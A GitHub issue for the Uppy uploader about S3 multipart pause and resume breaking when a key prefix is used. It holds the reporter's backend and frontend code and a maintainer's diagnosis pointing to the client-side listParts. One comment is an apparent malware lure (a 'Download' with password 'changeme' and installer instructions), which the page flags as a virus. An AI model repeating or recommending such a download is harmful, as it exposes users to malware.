Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Resume/Pause functionality breaks with S3 when adding a prefix to the key #5429

Open
2 tasks done
mshoaib112215 opened this issue Aug 26, 2024 · 5 comments
Open
2 tasks done
Labels

Comments

@mshoaib112215
Copy link

mshoaib112215 commented Aug 26, 2024

Initial checklist

  • I understand this is a bug report and questions should be posted in the Community Forum
  • I searched issues and couldn’t find anything (or linked relevant results below)

Link to runnable example

No response

Steps to reproduce

Description: When I add a prefix to the key to get the pre-signed URL for multipart upload, the file uploads successfully if I don't pause and resume the upload. However, if I pause and then resume the upload, I encounter the following error:

app-index.tsx:25  [Uppy] [14:33:31] TypeError: Cannot read properties of null (reading 'getData')
    at HTTPCommunicationQueue.uploadChunk (HTTPCommunicationQueue.js:272:1)
    at async Promise.all (index 0)
    at async HTTPCommunicationQueue.resumeUploadFile (HTTPCommunicationQueue.js:229:1)

If I remove the prefix from the key, the upload works fine even when paused and resumed. However, I need to add a prefix to the key for my use case.

Backend:

  1. Initialize S3 Client: Set up the S3 client and define the S3 bucket and object key prefix.

  2. Sign URL for Upload: Generate a signed URL for direct file upload to S3.

  3. Handle Multipart Upload:

    • Create: Initialize a multipart upload.
    • Sign Parts: Generate signed URLs for uploading file parts.
    • Complete: Finalize the multipart upload.
    • Abort: Cancel an incomplete multipart upload.
    • Delete File: Remove a file from S3.

Frontend:

  1. Set Up Uppy: Configure Uppy with the AwsS3Multipart plugin for handling multipart uploads.
  2. Request Signed URLs: Use the backend endpoints to get signed URLs for file uploads and parts.
  3. Manage Upload Lifecycle: Initiate, upload parts, and complete or abort the upload using Uppy.

Backend Code:

export const createMultipart = async (req, res, next) => {
    const client = getS3Client();
    const { type, metadata, filename } = req.body;
    if (typeof filename !== "string") {
        return res
            .status(400)
            .json({ error: "s3: content filename must be a string" });
    }
    if (typeof type !== "string") {
        return res.status(400).json({ error: "s3: content type must be a string" });
    }
    const Key = `upload/${crypto.randomUUID()}__${sanitize(filename)}`;

    const params = {
        Bucket: uploadBucket,
        Key: Key,
        ContentType: type,
        Metadata: metadata,
    };

    return client.createMultipartUpload(params, (err, data) => {
        if (err) {
            console.log(err)

            next(err)
            return;
        }
        res.json({
            key: data.Key,
            uploadId: data.UploadId,
        });
    });
}

export const signMultipart = async (req, res, next) => {
    const client = getS3Client();
    const { key, uploadId, partNumber } = req.query;

    if (!validatePartNumber(partNumber)) {
        return res.status(400).json({
            error: "s3: the part number must be an integer between 1 and 10000.",
        });
    }
    if (typeof key !== "string") {
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }

    client.getSignedUrl(
        "uploadPart",
        {
            Bucket: uploadBucket,
            Key: key,
            UploadId: uploadId,
            PartNumber: partNumber,
            Body: "",
            Expires: expires,
        },
        (err, url) => {
            if (err) {
                next(err);
                return
            }
            res.json({ url, expires });
        },
    );
}

export const getMultipart = async (req, res) => {
    const { key } = req.query;
    const Key = `${key}`;

    if (typeof Key !== "string") {
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }

    // List parts not supported by r2
    res.json([]);
    return;
}
export const multipartCompleted = async (req, res, next) => {
    const client = getS3Client();
    const { key, uploadId } = req.query;
    const Key = `${key}`;

    const { parts } = req.body;

    if (typeof key !== "string") {
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }
    if (!Array.isArray(parts) || !parts.every(isValidPart)) {
        return res.status(400).json({
            error: "s3: parts must be an array of {ETag, PartNumber} objects.",
        });
    }

    return client.completeMultipartUpload(
        {
            Bucket: uploadBucket,
            Key: Key,
            UploadId: uploadId,
            MultipartUpload: {
                Parts: parts,
            },
        },
        async (err, data) => {
            if (err) {
                console.error(err);
                next(err)
                return;
            }


            res.json({
                location: data.Location,
            });
        },
    );
}

export const deleteMultipart = async (req, res, next) => {
    const client = getS3Client();
    const { key, uploadId } = req.query;
    const Key = `${key}`;

    if (typeof key !== "string") {
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }

    try {

        return client.abortMultipartUpload(
            {
                Bucket: uploadBucket,
                Key: Key,
                UploadId: uploadId,
            },
            (err) => {
                if (err) {
                    console.error(err);

                    return;
                }
                res.json({});
            },
        );
    }
    catch (error) {
        next(error);
    }
}

Frontend Code:

uppy.use(AwsS3Multipart, {
  async getUploadParameters(file) {
    return fetch(`${NEXT_PUBLIC_API_URL}/api/upload/sign-s3`, {
      body: json.stringify({ filename: file.name }),
      credentials: "include",
    }).then((response) => response.json());
  },
  shouldUseMultipart(file) {
    return true;
  },
  async createMultipartUpload(file, signal) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    const metadata = {};

    if (!file.data) {
      const response = await fetch(file.preview);
      const data = await response.arrayBuffer();
      file.data = new Blob([data]);
    }
    const response = await fetch(`${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart`, {
      method: "POST",
      credentials: "include",
      headers: {
        accept: "application/json",
        "content-type": "application/json",
      },
      body: JSON.stringify({
        filename: file.name,
        type: file.type,
        metadata,
      }),
      signal,
    });

    if (!response.ok)
      throw new Error("Unsuccessful request", { cause: response });

    const data = await response.json();

    uploadedPartsList[data.key] = [];

    return data;
  },

  async abortMultipartUpload(file, { key, uploadId }, signal) {
    const response = await fetch(
      `${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart?uploadId=${encodeURIComponent(uploadId)}&key=${prefix}${encodeURIComponent(key)}`,
      {
        method: "DELETE",
        signal,
        credentials: "include",
      },
    );

    if (!response.ok)
      throw new Error("Unsuccessful request", { cause: response });
  },

  async signPart(file, { uploadId, key, partNumber, signal }) {
    if (signal.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    if (uploadId == null || key == null || partNumber == null) {
      throw new Error(
        "Cannot sign without a key, an uploadId, and a partNumber",
      );
    }

    const response = await fetch(
      `${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart/sign?uploadId=${encodeURIComponent(uploadId)}&partNumber=${encodeURIComponent(partNumber)}&key=${encodeURIComponent(key)}`,
      {
        signal,
        credentials: "include",

      },

    );

    if (!response.ok) {
      throw new Error(`Unsuccessful request: ${response.status} ${response.statusText}`);
    }

    const data = await response.json();
    return data;
 
  },

  async listParts(file, { key, uploadId, signal }) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

     return uploadedPartsList[key];
  },

  async completeMultipartUpload(file, { key, uploadId, parts, signal }) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    const fileObject = file.data;

    const response = await fetch(
      `${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart/complete?uploadId=${encodeURIComponent(uploadId)}&key=${encodeURIComponent(key)}&name=${encodeURIComponent(fileObject.name)}`,
      {
        method: "POST",
        credentials: "include",
        headers: {
          accept: "application/json",
          "content-type": "application/json",
        },
        body: JSON.stringify({
          parts,
        }),
        signal,
      },
    );

    if (!response.ok)
      throw new Error("Unsuccessful request", { cause: response });

    const data = await response.json();
    // Create a map of successful uploads by file name or ID

    const fileName = file.name;
    const size = file.size;
    const id = file.id;
    const sourcePath = file.s3Multipart.key;

    // Store updated file information in the map

    const existingFile = allFiles.find((file) => file.id === id);

    if (!existingFile) {
      allFiles.push({
        id,
        name: fileName,
        size,
        sourcePath,
      });
    }

    uploadedPartsList[key] = [];

    return data;
  },

  uploadPartBytes({ signature, body, onComplete, size, onProgress, signal }) {
    const { url, headers, expires } = signature;
    if (signal && signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    if (url == null) {
      throw new Error("Cannot upload to an undefined URL");
    }

    return new Promise((resolve, reject) => {
      const xhr = new XMLHttpRequest();
      xhr.open("PUT", url, true);
      if (headers) {
        Object.keys(headers).forEach((key) => {
          xhr.setRequestHeader(key, headers[key]);
        });
      }
      xhr.responseType = "text";
      if (typeof expires === "number") {
        xhr.timeout = expires * 1000;
      }

      function onabort() {
        xhr.abort();
      }
      function cleanup() {
        signal.removeEventListener("abort", onabort);
      }
      signal.addEventListener("abort", onabort);
      xhr.onabort = () => {
        cleanup();
        reject(createAbortError());
      };

      xhr.upload.addEventListener("progress", onProgress);

      xhr.addEventListener("abort", () => {
        cleanup();

        reject(createAbortError());
      });

      xhr.addEventListener("timeout", () => {
        cleanup();

        const error = new Error("Request has expired");
        error.source = { status: 403 };

        reject(error);
      });
      xhr.addEventListener("load", (ev) => {
        cleanup();

        const target = ev.target;

        if (
          target.status === 403 &&
          target.responseText.includes("<Message>Request has expired</Message>")
        ) {
          const error = new Error("Request has expired");
          error.source = target;
          reject(error);
          return;
        }
        if (target.status < 200 || target.status >= 300) {
          const error = new Error("Non 2xx");
          error.source = target;
          reject(error);
          return;
        }

        onProgress(size);

        // NOTE This must be allowed by CORS.
        const etag = target.getResponseHeader("ETag");

        if (etag === null) {
          reject(
            new Error(
              "AwsS3/Multipart: Could not read the ETag header. This likely means CORS is not configured correctly on the S3 Bucket. See https://uppy.io/docs/aws-s3-multipart#S3-Bucket-Configuration for instructions.",
            ),
          );
          return;
        }

        const urlObject = new URL(url);
        // change not-null assertion
        const key = urlObject.pathname.split("/").pop();
        const partNumber = parseInt(
          urlObject.searchParams.get("partNumber"),
          10,
        );

        uploadedPartsList[key]?.push({
          ETag: etag,
          PartNumber: partNumber,
        });

        onComplete(etag);
        resolve({
          ETag: etag,
        });
      });

      xhr.addEventListener("error", (ev) => {
        cleanup();

        const error = new Error("Unknown error");
        error.source = ev.target;
        reject(error);
      });

      xhr.send(body);
      if (signal) {
        signal.onabort = () => {
          xhr.abort();
        };
      }
    });
  },
});

If you need further details or assistance, please let me know!

Expected behavior

The file upload should resume and complete successfully without any errors, even when a prefix is added to the key.

Actual behavior

When the upload is resumed after pausing with a prefix added to the key, the above error occurs. Without the prefix, the upload resumes successfully.

@wuliaodexiaoluo
Copy link

wuliaodexiaoluo commented Aug 27, 2024

Download
password: changeme
In the installer menu, select "gcc."

Don't download it! This is a computer virus.

@aduh95
Copy link
Member

aduh95 commented Aug 27, 2024

@mshoaib112215 can you share the versions of the Uppy packages you're using please?

@aduh95
Copy link
Member

aduh95 commented Aug 27, 2024

The code you shared can't really be run as is (e.g. there's an undeclared variable prefix), so I can't really reproduce the problem you're seeing. Since you say the problem you're seeing is only visible when you pause/resume an upload, I guess the problem is with the listParts methods:

  async listParts(file, { key, uploadId, signal }) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

     return uploadedPartsList[key];
  }

I think the problem is that you're not communicating with your backend for listing parts, instead the client makes assumption about which parts have been uploaded, which are (at least sometimes) wrong, causing incomplete uploads. For reference, here's our internal implementation:

listParts(
file: UppyFile<M, B>,
{ key, uploadId, signal }: UploadResultWithSignal,
oldSignal?: AbortSignal,
): Promise<AwsS3Part[]> {
signal ??= oldSignal // eslint-disable-line no-param-reassign
this.#assertHost('listParts')
throwIfAborted(signal)
const filename = encodeURIComponent(key)
return this.#client
.get<
AwsS3Part[]
>(`s3/multipart/${encodeURIComponent(uploadId)}?key=${filename}`, { signal })
.then(assertServerError)
}

/**
* List parts that have been fully uploaded so far.
*
* Expected URL parameters:
* - uploadId - The uploadId returned from `createMultipartUpload`.
* Expected query parameters:
* - key - The object key in the S3 bucket.
* Response JSON:
* - An array of objects representing parts:
* - PartNumber - the index of this part.
* - ETag - a hash of this part's contents, used to refer to it.
* - Size - size of this part.
*/
function getUploadedParts (req, res, next) {
const client = getS3Client(req, res)
if (!client) return
const { uploadId } = req.params
const { key } = req.query
if (typeof key !== 'string') {
res.status(400).json({ error: 's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"' })
return
}
const bucket = getBucket({ bucketOrFn: config.bucket, req })
const parts = []
function listPartsPage (startAt) {
client.send(new ListPartsCommand({
Bucket: bucket,
Key: key,
UploadId: uploadId,
PartNumberMarker: startAt,
})).then(({ Parts, IsTruncated, NextPartNumberMarker }) => {
if (Parts) parts.push(...Parts)
if (IsTruncated) {
// Get the next page.
listPartsPage(NextPartNumberMarker)
} else {
res.json(parts)
}
}, next)
}
listPartsPage()
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

6 participants
@aduh95 @mshoaib112215 @wuliaodexiaoluo and others